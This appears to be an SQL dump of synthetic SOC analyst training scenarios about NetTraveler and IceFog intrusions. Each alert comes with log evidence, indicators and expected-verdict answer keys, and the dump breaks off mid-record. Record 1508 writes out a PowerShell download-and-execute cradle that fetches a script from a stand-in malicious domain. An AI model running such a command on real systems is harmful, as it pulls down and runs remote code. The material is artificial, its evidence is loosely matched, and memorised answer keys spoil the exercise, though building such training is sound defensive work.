(1503, 'Execution of NetTraveler\'s RAT', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following a successful phishing attempt, NetTraveler\'s Remote Access Trojan (RAT) was executed, establishing a foothold within the network. The malware was identified on a user endpoint, initiating network communications to an external IP address associated with known malicious activity.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"EDR-4567\",\"detected_by\":\"Endpoint Detection and Response\",\"hostname\":\"workstation-45\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.92.220.25\",\"user\":\"j.doe\",\"process\":{\"name\":\"nettraveler.exe\",\"path\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\nettraveler.exe\",\"hash\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\"},\"command_line\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\nettraveler.exe\",\"malicious_activity\":\"Established connection to C2 server\",\"indicators\":[{\"type\":\"ip\",\"value\":\"185.92.220.25\"},{\"type\":\"hash\",\"value\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\"},{\"type\":\"filename\",\"value\":\"nettraveler.exe\"},{\"type\":\"username\",\"value\":\"j.doe\"}]}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known NetTraveler RAT sample\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nettraveler.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution path 
detected\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account involved in phishing attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1504, 'Establishing Persistence via Registry Modification', 'high', 'Registry Change Logs', 'The RAT modifies registry keys to ensure it remains active even after system reboots, demonstrating NetTraveler\'s persistence tactics.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:23Z\",\"event_id\":4657,\"user\":\"john.doe\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"source_ip\":\"192.168.1.105\",\"target_object\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\NetTraveler\",\"registry_value_name\":\"NetTraveler\",\"registry_value_type\":\"REG_SZ\",\"registry_value_data\":\"\\\"C:\\\\Program Files\\\\NetTraveler\\\\nettraveler.exe\\\"\",\"process_id\":4820,\"process_name\":\"C:\\\\Windows\\\\System32\\\\regedit.exe\",\"associated_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"attacker_ip\":\"203.0.113.45\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous NetTraveler activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable associated with NetTraveler persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hashdb\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of the NetTraveler 
executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1505, 'Lateral Movement Detected through SMB Protocol', 'high', 'Network Traffic Analysis', 'An advanced persistent threat has been detected leveraging the SMB protocol for lateral movement within the network. The adversary is attempting to compromise additional internal systems, utilizing known credentials and malicious tools.', 'Network Intrusion', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"192.168.1.150\",\"protocol\":\"SMB\",\"action\":\"allowed\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\192.168.1.150\\\\C$\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"external_ip\":\"203.0.113.45\",\"event_id\":\"SMB-Event-445\",\"event_description\":\"Successful SMB connection and file transfer detected.\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal network IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with external attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_blacklist\",\"verdict\":\"malicious\",\"details\":\"Hash of malicious executable associated with APT 
activity.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1506, 'Data Exfiltration via Encrypted Channels', 'critical', 'Outbound Traffic Logs', 'In the final stage of the operation, the exfiltration of sensitive government data was detected over encrypted channels. The activity aligns with the NetTraveler APT group, indicating a sophisticated espionage effort.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"10.0.1.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"government_documents.zip\",\"action\":\"allowed\",\"bytes_sent\":10485760,\"indicator\":\"NetTraveler\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with NetTraveler APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash known to be used in exfiltration activities by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"government_documents.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Filename contains sensitive government data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1507, 'Spear Phishing Attempt Detected', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting key personnel at a defense supplier in Japan. The email contained a malicious attachment designed to gain initial access to the supply chain networks.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_subject\":\"Urgent: Updated Project Plans\",\"sender_email\":\"john.doe@trusted-partner.com\",\"recipient_email\":\"satoshi.takahashi@defense-supplier.jp\",\"sender_ip\":\"198.51.100.25\",\"recipient_ip\":\"192.168.1.45\",\"attachment_name\":\"Project_Plans_2023.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_url\":\"http://malicious-link.com/download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"detection_method\":\"Signature-Based Detection\",\"email_content\":\"Please review the attached project plans and let me know if you have any questions. Regards, John Doe\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@trusted-partner.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known phishing server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple engines.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hosts malware 
files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt Detected\",\"date\":\"2026-03-15T20:58:15.167Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1508, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) Logs', 'A backdoor was executed on the host system, allowing remote command execution by IceFog. The backdoor was part of a malicious payload opened by the user.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"event_id\":\"EDR12345\",\"hostname\":\"DESKTOP-ABC123\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious-domain.com/payload.ps1\')\",\"file_hash\":\"2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"payload.ps1\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with IceFog.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known IceFog payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute the IceFog backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1509, 'Establishing Persistence via Registry Key Modification', 'medium', 'System Configuration Audits', 'During a routine system configuration audit, it was detected that IceFog is attempting to establish persistence by embedding scripts in startup folders and modifying registry keys. This ensures access even if the system is rebooted.', 'TTPs', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"registry_modification\",\"username\":\"compromised_user\",\"host_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"modified_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousScript\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\evil_script.vbs\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"added\",\"indicator\":\"persistence_attempt\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with IceFog activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\evil_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to maintain persistence on the host.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with IceFog malware 
